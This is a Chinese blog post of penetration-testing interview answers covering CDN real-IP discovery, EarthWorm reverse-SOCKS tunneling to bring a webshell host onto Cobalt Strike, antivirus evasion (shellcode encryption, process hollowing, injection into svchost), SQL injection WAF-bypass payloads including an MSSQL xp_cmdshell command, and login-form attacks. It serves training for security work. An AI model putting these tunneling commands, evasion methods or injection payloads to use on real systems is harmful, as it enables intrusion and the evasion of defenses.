当前位置: 首页 > news >正文

2025年渗透测试面试题总结-30(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、邮箱类型判断

二、真实IP确认方法

三、不出网机器上线CS

四、代理工具与杀软对抗

五、免杀技术核心思路

六、SQL注入Bypass技巧

七、红队HW信息收集

八、Whois信息内容

九、登录框攻击面

十、Python/PHP在渗透中的用途

二百五十一、如何判断邮箱类型二百五十二、如何确定你拿到的就是真实ip二百五十三、机器不出网如何上线到cs(不出网的机器是拿到wenshell的机器)二百五十四、走代理用哪些工具,遇到杀软怎么办二百五十五、如何免杀二百五十六、sql注入bypass有哪些(尽可能多说)二百五十七、平常红队hw信息收集方式有哪些二百五十八、whois 收集的信息包括哪些二百五十九、给一个登录框能想到哪些利用方式二百六十、平常开发经常用python 和php做什么

一、邮箱类型判断

  1. 域名分析
    • 企业邮箱:域名与公司官网一致(如 user@company.com
    • 公共邮箱:@gmail.com@qq.com
    • 自建邮箱:MX记录指向私有IP或非知名邮件服务商
  2. SMTP响应特征
    • 连接25/465端口,通过HELO命令返回服务标识(如Exchange、Postfix)
  3. 邮件头解析
    • 检查 Received: 字段中的服务器路径和中间件类型(如 X-Mailer: Sendmail

二、真实IP确认方法

  1. 网络层验证
    • 使用 traceroute 观察最后一跳IP
    • 检查TCP/IP数据包TTL值是否与宣称系统匹配
  2. 协议级检测
    • HTTP请求:对比 X-Forwarded-For 与TCP连接IP
    • SSL证书关联:扫描IP的443端口证书是否绑定目标域名
  3. 第三方平台验证
    • 通过Shodan/Censys搜索IP历史绑定记录
    • 利用CDN识别工具(如cdnchecker.com

三、不出网机器上线CS

前提:已获取Webshell但目标无外网连接

mermaidgraph LR A[Webshell] --> B[上传代理工具] B --> C[建立内网隧道] C --> D[通过可控节点转发流量]
  1. 工具选择
    • reGeorg+Proxychains(HTTP隧道)
    • EarthWorm(SOCKS5反向代理)
  2. 关键步骤
    • 在可控公网服务器启动监听(ew -s rcsocks -l 1080 -e 8888
    • 从不出网机器反向连接:ew -s rssocks -d <公网IP> -e 8888
    • 配置CS监听器指向本地SOCKS代理

四、代理工具与杀软对抗

代理类型推荐工具免杀策略
HTTP隧道reGeorg, Tiny自定义响应头+流量AES加密
SOCKS5EarthWorm, Neo-reGeorg协议混淆(如伪装成SSL流量)
DNS隧道dnscat2使用TXT记录+长域名分割传输
对抗要点
  • 内存加密(如Cobalt Strike的Secure Profile
  • 流量特征修改(JA3指纹伪造)
  • 进程注入(注入到svchost.exe 等系统进程)

五、免杀技术核心思路

  1. 代码层面
    • Shellcode加密(AES/RC4)+ 运行时解密
    • API动态调用(通过Hash检索函数地址)
  2. 加载方式
    • 进程空洞(Process Hollowing)
    • 反射型DLL注入
  3. 行为伪装
    • 签名劫持(LOLBins)
    • 合法进程注入(如利用msbuild.exe 执行C#载荷)

六、SQL注入Bypass技巧

WAF绕过类

sql/*!50000SELECT*/ 1,2,3 -- MySQL内联注释 SEL%0bECT 1,2,3 -- 空白符分割(%0b为垂直制表符) UNION ALL SELECT 1,2,3 -- 等价替换

过滤绕过类

  • 大小写/双写:uNIoN sELecTuniUNIONon selSELECTect
  • 编码转换:CHAR(65,66,67) 代替 'ABC'
  • 参数污染:id=1&id=2' and 1=1--

数据库特性利用

  • MySQL:/*!50000CONCAT*/(@@version)
  • MSSQL:DECLARE @a VARCHAR(50)=%27EXEC master..xp_cmdshell%27; EXEC(@a+%27whoami%27)

共整理37种Bypass手法(篇幅限制未全列),重点:理解WAF解析差异+数据库特性


七、红队HW信息收集

  1. 被动情报
    • Whois/备案查询 → 关联子公司和IP段
    • GitHub敏感信息扫描(API密钥、内部文档)
  2. 主动探测
    • 全端口扫描(Masscan)+ 服务识别(Nmap -sV)
    • 子域名爆破(*.target.com
  3. 社会工程
    • 员工领英信息 → 制作钓鱼字典
    • 公开招标文件 → 获取内部系统名称

八、Whois信息内容

json{ "注册人": "姓名/组织(可能匿名)", "联系方式": "邮箱/电话(需验证)", "域名服务器": "NS1.xxx.com, NS2.xxx.com", "注册日期": "2020-01-01", "过期日期": "2025-12-31", "IP关联": "历史解析记录(通过APNIC数据库反查)" }

注意:GDPR可能导致欧洲域名信息隐藏


九、登录框攻击面

  1. 认证绕过
    • SQL注入:admin'--
    • Cookie篡改:admin=1; role=superuser
  2. 凭证相关
    • 暴力破解(Burp Intruder)
    • 密码重置逻辑漏洞(如修改接收邮箱)
  3. 后端漏洞
    • LDAP注入:*)(&
    • JWT密钥破解(jwt_tool)
  4. 前端风险
    • XSS存储型 → 窃取Cookie
    • CSRF → 强制修改密码

十、Python/PHP在渗透中的用途

语言典型场景常用库/框架
Python漏洞PoC编写(Requests+BeautifulSoup)Scapy(流量伪造)、PyInstaller(打包)
C2开发(Flask/Socket)Pwntools(二进制利用)
PHPWebshell编写(蚁剑/冰蝎连接)Guzzle(HTTP代理穿透)
CMS漏洞利用(WordPress插件审计)PHP-FFI(调用系统API)

案例

  • Python自动化信息收集:subprocess调用Nmap+解析XML报告
  • PHP内存马:通过php://input注入恶意路由到正常应用
http://www.dtcms.com/a/348083.html

相关文章:

  • Java 20 新特性及具体应用
  • Cisdem Video Converter for mac 优秀的视频格式转换工具
  • 夜间跌倒检测响应速度↑150%!陌讯多模态骨架追踪算法在智慧养老院的落地实践
  • 埃氏筛|树dfs|差分计数
  • JVM OOM问题排查与解决思路
  • Meta AI 剧变:汪滔挥刀重组,Llama 开源路线告急,超级智能梦碎还是重生?
  • 96、23种设计模式之原型模式(5/23)
  • STM32 USB 之大坑
  • ubuntu中网卡的 IP 及网关配置设置为永久生效
  • Ubuntu24.04环境下causal_conv1d和mamba_ssm安装
  • 嵌入式八股文面试题总结(QT、RTOS、Linux、ARM、C/C++)(持续更新)
  • QT-布局管理器
  • 音视频面试题集锦第 32 期
  • C语言指针5
  • 使用虚幻引擎5(UE5)开发类似《原神》的开放世界游戏:从技术架构到实践指南
  • LeetCode-542. 01 矩阵
  • (LeetCode 每日一题) 1493. 删掉一个元素以后全为 1 的最长子数组 (双指针)
  • 03-鸿蒙架构与编程模型
  • ChainVault:重塑亚洲黄金交易基建,引领RWA金融新浪潮
  • Java 22 新特性及具体应用
  • week4-[字符数组]英语作文
  • Games101 作业1 旋转与投影
  • 量子链(Qtum)分布式治理协议
  • Qt+windows+QtInstallerFramework打包可执行文件教程-美观且简单
  • Django的Serializers与 fastapi 的Pydantic
  • Excel 转化成JSON
  • Java:LinkedList的使用
  • Django的Settings 配置文件详解
  • 【ArcGIS Pro 全攻略】GIS 数据格式终极指南:从原理到实战,再也不纠结选哪种格式!
  • React useState 全面深入解析